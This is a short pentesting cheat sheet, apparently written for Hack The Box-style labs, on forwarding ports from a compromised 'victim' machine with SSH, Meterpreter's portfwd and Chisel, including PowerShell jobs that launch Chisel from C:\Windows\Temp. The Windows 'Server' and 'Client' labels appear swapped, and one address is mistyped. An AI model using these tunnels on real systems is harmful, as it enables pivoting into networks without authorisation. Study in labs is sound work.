Author: lomar
Port Forwarding
When local services that listen to the IPv4 address 127.0.0.1 are running on the target machine, we may need to access these services from our host machine, in such cases we can access this service by forwarding the port number on which the local service is running to our host machine. We can basically do port forwarding with 3 methods.
Method 1: SSH
If we can access the victim machine with SSH, we can easily perform port forwarding with SSH connection. If you want to perform both port forwarding and getting shell:
ssh user_name@victim.htb -L local_port:127.0.0.1:remote_portFor example:
- There is a service running on port
8080and listening127.0.0.1in victim machine - We want to forward it to port
8080of our machine
ssh user_name@victim.htb -L 8080:127.0.0.1:8080Running Background
If you only want to perform port forwarding and do not want to run commands with SSH:
ssh user_name@victim.htb -fNL local_port:127.0.0.1:remote_portFor example:
- There is a service running on port
8080and listening127.0.0.1in victim machine - We want to forward it to port
8080of our machine
ssh user_name@victim.htb -fNL 8080:127.0.0.1:8080Method 2: Meterpreter portfwd
The portfwd command from within the Meterpreter shell is most commonly used as a pivoting technique, allowing direct access to machines otherwise inaccessible from the attacking system. Running this command on a compromised host with access to both the attacker and destination network (or system), we can essentially forward TCP connections through this machine, effectively making it a pivot point. Much like the port forwarding technique used with an ssh connection, portfwd will relay TCP connections to and from the connected machines.
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional).
-h Help banner.
-l <opt> The local port to listen on.
-p <opt> The remote port to connect on.
-r <opt> The remote host to connect on.
meterpreter >-L: Use to specify the listening host. Unless you need the forwarding to occur on a specific network adapter you can omit this option. If none is entered0.0.0.0will be used.-h: Displays the above information.-l: This is a local port which will listen on the attacking machine. Connections to this port will be forwarded to the remote system.-p: The port to which TCP connections will be forward to.-r: The IP address the connections are relayed to (target).
Add
meterpreter > portfwd add –l <local_port> –p <target_port> –r <target_ip>Delete
meterpreter > portfwd delete –l <local_port> –p <target_port> –r <target_ip>For example:
- There is a service running on port
8080and listening127.0.0.1in victim machine - We want to forward it to port
8080of our machine
meterpreter > portfwd add –l 8080 –p 8080 –r 127.0.0.1Flush
This argument will allow us to remove all the local port forward at once.
meterpreter > portfwd flushMethod 3: Chisel
Linux
Server
To work with Chisel, we first need to run a Chisel server on our host machine, by specifying the port(s) we want to listen to.
chisel server --port 51234Client
To route local services to our host, we will run chisel client on the victim machine and route port(s) to our host.
chisel client your_machine_ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.01:8443Windows
Server
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:33060:127.0.0.1:3306','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $scriptBlockClient
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') }
Start-Job -ScriptBlock $scriptBlock